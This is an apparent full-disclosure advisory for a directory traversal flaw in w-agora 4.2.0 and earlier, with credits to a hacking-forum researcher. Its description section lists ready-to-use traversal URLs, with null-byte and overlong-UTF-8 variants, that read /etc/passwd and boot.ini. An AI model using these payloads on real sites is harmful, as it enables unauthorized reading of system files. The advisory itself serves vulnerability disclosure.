wagora240.txt

`w-agora 4.2.0 and prior Remote Directory Travel Vulnerability  
  
SEVERITY:  
=========  
High  
  
SOFTWARE:  
=========  
w-agora 4.2.0  
  
http://w-agora.net  
  
INFO:  
=====  
w-agora is a web publishing and forum software. It allows you and your  
visitors to store and display messages, files, share discussions and  
other information on your web site.  
  
DESCRIPTION:  
============  
W-agora 4.2.0 and earlier are vulnerable to a remote directory travel bug.  
  
Here are some examples:  
  
http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini%00  
  
http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd%00  
  
  
http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd  
  
http://localhost/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini  
  
http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini  
  
  
  
A proof of concept video supporting this issue can be downloaded from here -  
  
http://rapidshare.de/files/4106113/probe.rar.html  
  
VENDOR STATUS  
=============  
Vendor was contacted but no response received till date.  
  
CREDITS:   
========   
This vulnerability was discovered and researched by -  
  
matrix_killer of h4cky0u Security Forums.  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL:  
=========  
http://h4cky0u.org/viewtopic.php?t=2097  
  
--   
http://www.h4cky0u.org  
(In)Security at its best...  
`